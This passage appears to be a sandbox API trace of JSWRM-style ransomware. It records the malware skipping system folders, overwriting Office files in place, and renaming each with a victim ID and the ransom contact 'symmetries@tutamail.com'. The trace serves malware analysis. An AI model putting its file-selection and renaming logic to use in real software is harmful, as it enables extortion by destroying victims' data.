Flags=0x0, Size=0xa0) returned 0x23d920 [0114.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0114.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0114.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0114.121] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0114.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0114.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0114.123] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a9e866, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a9e866, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa3dba42, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6f, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="GROOVE_F_COL.HXK", cAlternateFileName="GROOVE~1.HXK")) returned 1 [0114.123] lstrcmpiW (lpString1="GROOVE_F_COL.HXK", lpString2=".") returned 1 [0114.123] lstrcmpiW (lpString1="GROOVE_F_COL.HXK", lpString2="..") returned 1 [0114.123] lstrcmpiW (lpString1="GROOVE_F_COL.HXK", lpString2="...") returned 1 [0114.123] lstrcmpiW (lpString1="GROOVE_F_COL.HXK", lpString2="windows") returned -1 [0114.123] lstrcmpiW (lpString1="GROOVE_F_COL.HXK", lpString2="recovery") returned -1 [0114.123] lstrcmpiW (lpString1="GROOVE_F_COL.HXK", lpString2="perflogs") returned -1 [0114.123] lstrcmpiW (lpString1="GROOVE_F_COL.HXK", lpString2="documents and settings") returned 1 [0114.123] lstrcmpiW (lpString1="GROOVE_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0114.123] lstrcmpiW (lpString1="GROOVE_F_COL.HXK", lpString2="system volume information") returned -1 [0114.123] lstrcmpiW (lpString1="GROOVE_F_COL.HXK", lpString2="msocache") returned -1 [0114.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE_F_COL.HXK", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0114.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0114.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE_F_COL.HXK", cchWideChar=16, lpMultiByteStr=0x241100, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVE_F_COL.HXK", lpUsedDefaultChar=0x0) returned 16 [0114.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE_F_COL.HXK", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0114.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0114.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE_F_COL.HXK", cchWideChar=16, lpMultiByteStr=0x241010, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVE_F_COL.HXK", lpUsedDefaultChar=0x0) returned 16 [0114.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0114.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0114.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0114.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.125] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=111) returned 1 [0114.125] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0114.125] ReadFile (in: hFile=0x238, lpBuffer=0x232ae0, nNumberOfBytesToRead=0x60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x232ae0*, lpNumberOfBytesRead=0x345e89c*=0x60, lpOverlapped=0x0) returned 1 [0114.126] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.126] WriteFile (in: hFile=0x238, lpBuffer=0x232ae0*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x232ae0*, lpNumberOfBytesWritten=0x345e898*=0x60, lpOverlapped=0x0) returned 1 [0114.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0114.126] CloseHandle (hObject=0x238) returned 1 [0114.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0114.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0114.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0114.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0114.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0114.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0114.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0114.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0114.127] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0114.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0114.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0114.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0114.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0114.128] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a9e866, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a9e866, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ac4a8a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6e, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="GROOVE_K_COL.HXK", cAlternateFileName="GROOVE~2.HXK")) returned 1 [0114.128] lstrcmpiW (lpString1="GROOVE_K_COL.HXK", lpString2=".") returned 1 [0114.128] lstrcmpiW (lpString1="GROOVE_K_COL.HXK", lpString2="..") returned 1 [0114.128] lstrcmpiW (lpString1="GROOVE_K_COL.HXK", lpString2="...") returned 1 [0114.128] lstrcmpiW (lpString1="GROOVE_K_COL.HXK", lpString2="windows") returned -1 [0114.128] lstrcmpiW (lpString1="GROOVE_K_COL.HXK", lpString2="recovery") returned -1 [0114.128] lstrcmpiW (lpString1="GROOVE_K_COL.HXK", lpString2="perflogs") returned -1 [0114.128] lstrcmpiW (lpString1="GROOVE_K_COL.HXK", lpString2="documents and settings") returned 1 [0114.128] lstrcmpiW (lpString1="GROOVE_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0114.128] lstrcmpiW (lpString1="GROOVE_K_COL.HXK", lpString2="system volume information") returned -1 [0114.128] lstrcmpiW (lpString1="GROOVE_K_COL.HXK", lpString2="msocache") returned -1 [0114.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0114.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE_K_COL.HXK", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0114.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0114.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE_K_COL.HXK", cchWideChar=16, lpMultiByteStr=0x241380, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVE_K_COL.HXK", lpUsedDefaultChar=0x0) returned 16 [0114.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0114.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE_K_COL.HXK", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0114.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0114.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE_K_COL.HXK", cchWideChar=16, lpMultiByteStr=0x2413d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVE_K_COL.HXK", lpUsedDefaultChar=0x0) returned 16 [0114.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0114.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0114.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0114.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.129] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=110) returned 1 [0114.130] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0114.130] ReadFile (in: hFile=0x238, lpBuffer=0x2330f8, nNumberOfBytesToRead=0x60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2330f8*, lpNumberOfBytesRead=0x345e89c*=0x60, lpOverlapped=0x0) returned 1 [0114.131] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.131] WriteFile (in: hFile=0x238, lpBuffer=0x2330f8*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2330f8*, lpNumberOfBytesWritten=0x345e898*=0x60, lpOverlapped=0x0) returned 1 [0114.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0114.131] CloseHandle (hObject=0x238) returned 1 [0114.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0114.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0114.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0114.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0114.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0114.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0114.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.131] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0114.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0114.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0114.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0114.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0114.132] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x30ca74c, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x30ca74c, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x30ca74c, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xb050, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="HVAC.VSL", cAlternateFileName="")) returned 1 [0114.132] lstrcmpiW (lpString1="HVAC.VSL", lpString2=".") returned 1 [0114.132] lstrcmpiW (lpString1="HVAC.VSL", lpString2="..") returned 1 [0114.132] lstrcmpiW (lpString1="HVAC.VSL", lpString2="...") returned 1 [0114.132] lstrcmpiW (lpString1="HVAC.VSL", lpString2="windows") returned -1 [0114.132] lstrcmpiW (lpString1="HVAC.VSL", lpString2="recovery") returned -1 [0114.132] lstrcmpiW (lpString1="HVAC.VSL", lpString2="perflogs") returned -1 [0114.132] lstrcmpiW (lpString1="HVAC.VSL", lpString2="documents and settings") returned 1 [0114.132] lstrcmpiW (lpString1="HVAC.VSL", lpString2="$RECYCLE.BIN") returned 1 [0114.132] lstrcmpiW (lpString1="HVAC.VSL", lpString2="system volume information") returned -1 [0114.132] lstrcmpiW (lpString1="HVAC.VSL", lpString2="msocache") returned -1 [0114.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0114.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HVAC.VSL", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0114.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HVAC.VSL", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HVAC.VSL", lpUsedDefaultChar=0x0) returned 8 [0114.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0114.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0114.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HVAC.VSL", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0114.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HVAC.VSL", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HVAC.VSL", lpUsedDefaultChar=0x0) returned 8 [0114.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0114.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0114.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0114.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0114.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\HVAC.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\hvac.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.134] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=45136) returned 1 [0114.134] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb050) returned 0x24c1d0 [0114.135] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xb050, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xb050, lpOverlapped=0x0) returned 1 [0114.199] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.199] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xb050, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xb050, lpOverlapped=0x0) returned 1 [0114.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0114.200] CloseHandle (hObject=0x238) returned 1 [0114.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0114.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0114.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0114.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0114.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0114.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0114.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0114.201] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\HVAC.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\hvac.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\HVAC.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\hvac.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0114.202] 